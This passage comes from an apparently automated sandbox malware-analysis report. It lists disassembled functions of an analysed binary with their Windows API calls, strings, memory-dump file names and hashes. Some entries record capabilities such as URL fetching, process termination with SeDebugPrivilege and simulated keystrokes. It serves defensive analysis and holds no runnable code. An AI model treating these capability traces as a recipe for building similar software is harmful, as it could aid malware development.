                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E99987
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      • Opcode ID: 6b3bae6306011267501fdeb5077683084eb6b52fc356ea4e3e862aaa7a08ebe1
                                                      • Instruction ID: efdb40a203e4c82a17c27043cc652da703c04db20af86f615181f3c48d75c4b6
                                                      • Opcode Fuzzy Hash: 6b3bae6306011267501fdeb5077683084eb6b52fc356ea4e3e862aaa7a08ebe1
                                                      • Instruction Fuzzy Hash: DC215E3194021EABCF15AF90CC0AEEE7BB5FF18704F046469F629760A2EB719618DB50
                                                      Function 00E9209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 00E920AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E920C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E9214D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      • Opcode ID: 9a2ce5356512f13b85d7e22a511002478db47930451acacad2703d9612330990
                                                      • Instruction ID: 94c5330c00cecc962cbb0d20b58669d33651c54424de1fae8349905fa0ae0426
                                                      • Opcode Fuzzy Hash: 9a2ce5356512f13b85d7e22a511002478db47930451acacad2703d9612330990
                                                      • Instruction Fuzzy Hash: BF110A77688706BAFE012221DC06DFA379CCB14729F20302AFB04B50D2FA6158565614
                                                      Function 00E6CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      • Opcode ID: f8b8bf204cca5eecd015ae8dafda18d1ffbcd5b362df41e5f69f3b2b3eaddf78
                                                      • Instruction ID: 8c0ee28cc604b7dbfbc142b53d6820b1638067f31a3034436e0688e1b935e66b
                                                      • Opcode Fuzzy Hash: f8b8bf204cca5eecd015ae8dafda18d1ffbcd5b362df41e5f69f3b2b3eaddf78
                                                      • Instruction Fuzzy Hash: F6618971B85204AFDB25AFB4BC41A797BE5EF053E4F24116DF984B7281DA329D0187A0
                                                      Function 00EC50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EC5186
                                                      • ShowWindow.USER32(?,00000000), ref: 00EC51C7
                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00EC51CD
                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EC51D1
                                                        • Part of subcall function 00EC6FBA: DeleteObject.GDI32(00000000), ref: 00EC6FE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC520D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC521A
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC524D
                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EC5287
                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EC5296
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                      • String ID:
                                                      • API String ID: 3210457359-0
                                                      • Opcode ID: e1da3e01467206ea3a08b7ed1d9794a9ad49a1a5ef271f40e1ca783d0318fad6
                                                      • Instruction ID: 8eb1fa69c28952e31aa76f9fe6261c456093545cfa02ffd574a38cf644fd7330
                                                      • Opcode Fuzzy Hash: e1da3e01467206ea3a08b7ed1d9794a9ad49a1a5ef271f40e1ca783d0318fad6
                                                      • Instruction Fuzzy Hash: 6B51A332A41A08AEEF249F24CD49FD937F5EB05324F54601AF515B62E1C372B9D2DB41
                                                      Function 00E48B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E86890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E868A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E868B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E868D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E868F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E48874,00000000,00000000,00000000,000000FF,00000000), ref: 00E86901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E8691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E48874,00000000,00000000,00000000,000000FF,00000000), ref: 00E8692D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 1628b0a88997ef791feb598099a779b9c978bf1e1321687e4415cd0c5991ff6f
                                                      • Instruction ID: 6f92f825a3c3f6580ace1a7d816fa7b3810cd0796db3f224acb6785f133ab759
                                                      • Opcode Fuzzy Hash: 1628b0a88997ef791feb598099a779b9c978bf1e1321687e4415cd0c5991ff6f
                                                      • Instruction Fuzzy Hash: 3851B974A00209EFDB20DF25DD45FAA3BB5FB88714F105128F90AA72A0DB71E991DB40
                                                      Function 00EAC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EAC182
                                                      • GetLastError.KERNEL32 ref: 00EAC195
                                                      • SetEvent.KERNEL32(?), ref: 00EAC1A9
                                                        • Part of subcall function 00EAC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EAC272
                                                        • Part of subcall function 00EAC253: GetLastError.KERNEL32 ref: 00EAC322
                                                        • Part of subcall function 00EAC253: SetEvent.KERNEL32(?), ref: 00EAC336
                                                        • Part of subcall function 00EAC253: InternetCloseHandle.WININET(00000000), ref: 00EAC341
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
                                                      • Opcode ID: 5254d35cd8980f4ee7c1beb32aeb39b6a548ad6b5210f7b3732e36b8f8c1c939
                                                      • Instruction ID: 4e4218b3cc02c4a1599dbb42a0a78acd4ec529647b2b53d569a9ca2c056cd3a9
                                                      • Opcode Fuzzy Hash: 5254d35cd8980f4ee7c1beb32aeb39b6a548ad6b5210f7b3732e36b8f8c1c939
                                                      • Instruction Fuzzy Hash: 3431A371200A05EFDB219FB5DD04AA67BF8FF1D304B24542EF55AAA620D731F816DBA0
                                                      Function 00E925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E925BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E925DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E925DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E925E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E92601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E92605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E92623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E92627
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: d366bada70214ca7ab3008fd89776880374a387ebe0206407c9cee57d187de80
                                                      • Instruction ID: 4ab3b0de65bfeb22256125e5ae276dafde611cafc91ca8000b2664b18ff4b85f
                                                      • Opcode Fuzzy Hash: d366bada70214ca7ab3008fd89776880374a387ebe0206407c9cee57d187de80
                                                      • Instruction Fuzzy Hash: EF01D830790210BBFF10676A9C8AF597FA9DB4EB11F211015F318BE1D1C9E214458A6A
                                                      Function 00E91803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E91449,?,?,00000000), ref: 00E9180C
                                                      • HeapAlloc.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E91813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91449,?,?,00000000), ref: 00E91828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E91449,?,?,00000000), ref: 00E91830
                                                      • DuplicateHandle.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E91833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91449,?,?,00000000), ref: 00E91843
                                                      • GetCurrentProcess.KERNEL32(00E91449,00000000,?,00E91449,?,?,00000000), ref: 00E9184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E9184E
                                                      • CreateThread.KERNEL32(00000000,00000000,00E91874,00000000,00000000,00000000), ref: 00E91868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 857398a8d1d4f5d2f872093610d8c72c1c9ab9619fd8c9ba1586795b88ccb7ef
                                                      • Instruction ID: 35147f5d4fa9ebc04bf99b3570dbae0d7447cef30608aa65941c529cbd54e017
                                                      • Opcode Fuzzy Hash: 857398a8d1d4f5d2f872093610d8c72c1c9ab9619fd8c9ba1586795b88ccb7ef
                                                      • Instruction Fuzzy Hash: 9101BFB5241344BFE710AB66DC4DF5B3B6CEB89B11F144461FA05EB192C6759805CB20
                                                      Function 00EBA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E9D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00E9D501
                                                        • Part of subcall function 00E9D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00E9D50F
                                                        • Part of subcall function 00E9D4DC: CloseHandle.KERNEL32(00000000), ref: 00E9D5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBA16D
                                                      • GetLastError.KERNEL32 ref: 00EBA180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBA1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBA268
                                                      • GetLastError.KERNEL32(00000000), ref: 00EBA273
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBA2C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: a9cc030db598005dbb20dbd435abc7abe811c1feaab0d146d71942a911b5e7a8
                                                      • Instruction ID: e661b1a914e21c75abc49494af14f5e4191a07ba3b5cbce5955cee04759e28b7
                                                      • Opcode Fuzzy Hash: a9cc030db598005dbb20dbd435abc7abe811c1feaab0d146d71942a911b5e7a8
                                                      • Instruction Fuzzy Hash: B661B570205242AFDB10DF19C494F56BBE1AF44318F1894ACE4566F7A3C772ED49CB92
                                                      Function 00EC3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC3925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EC393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC3954
                                                      • _wcslen.LIBCMT ref: 00EC3999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC39C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC39F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: 8e99545a2875ffcbf08f9e6df3aab646b62dc352bd013d54acff65aa0e4c6a6a
                                                      • Instruction ID: 941883fabbf33e3f12f0d738bbbd4f1fb7ae6b94520871c85816165ebf021891
                                                      • Opcode Fuzzy Hash: 8e99545a2875ffcbf08f9e6df3aab646b62dc352bd013d54acff65aa0e4c6a6a
                                                      • Instruction Fuzzy Hash: AB41C231A00208ABDF219F64CD45FEA7BA9FF48354F10552AF948F7281D7729A85CB90
                                                      Function 00E9BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9BCFD
                                                      • IsMenu.USER32(00000000), ref: 00E9BD1D
                                                      • CreatePopupMenu.USER32 ref: 00E9BD53
                                                      • GetMenuItemCount.USER32(011B5240), ref: 00E9BDA4
                                                      • InsertMenuItemW.USER32(011B5240,?,00000001,00000030), ref: 00E9BDCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 16848750844a8d37d82a55827ff75c08b72bd29229b5396b5b1c6bb5a64ff4ef
                                                      • Instruction ID: ef12d867b235b8921100b4a6181bc34ae4905968a0e13dbb88da38b7c151d9c5
                                                      • Opcode Fuzzy Hash: 16848750844a8d37d82a55827ff75c08b72bd29229b5396b5b1c6bb5a64ff4ef
                                                      • Instruction Fuzzy Hash: 7551BF70A002099BDF10DFA9EA88BEEBBF8BF45318F245169E405F7290D7709945CB61
                                                      Function 00E52D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00E52D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E52E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: &H$csm
                                                      • API String ID: 1170836740-1242228090
                                                      • Opcode ID: e686417463f5328d970938cd716259fde60df47417ededf5f2c5a467535b50d8
                                                      • Instruction ID: df85f41f30cfba28989063d21767f6ed5bd6b6881e43996d51cdfba471349b5a
                                                      • Opcode Fuzzy Hash: e686417463f5328d970938cd716259fde60df47417ededf5f2c5a467535b50d8
                                                      • Instruction Fuzzy Hash: D441D834A00208DBCF14DF68C845A9EBBF4BF4631AF149559EE147B392D731AA09CBD0
                                                      Function 00E9C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E9C913
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: fca8bdfd6aa5920f38fb67c691816600c8ab9e883527e324671d601f61f061d0
                                                      • Instruction ID: 2d611d74db4ec1336da32fcbc0ee15a85b1825109f3297a073255fcf8883a7b0
                                                      • Opcode Fuzzy Hash: fca8bdfd6aa5920f38fb67c691816600c8ab9e883527e324671d601f61f061d0
                                                      • Instruction Fuzzy Hash: BC11D53268930ABBAB05BB549C82CAA77DCDF1535DB30242BF904B62C2E7A16E415364
                                                      Function 00E9ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 74e8364881a888eb61b7a575dc56ea41bf3019e2093e07c78fb3064581ba2cc2
                                                      • Instruction ID: 1019ac31052da8be2c29c044912b897338474cf50b53552cfa61b8ecf0b39e7d
                                                      • Opcode Fuzzy Hash: 74e8364881a888eb61b7a575dc56ea41bf3019e2093e07c78fb3064581ba2cc2
                                                      • Instruction Fuzzy Hash: 04419265C1011865CB11EBB48C8A9CFB7ECEF45311F50A866EA14F3261FB34D249C3A5
                                                      Function 00E4F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E4F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E8F3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E8F454
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
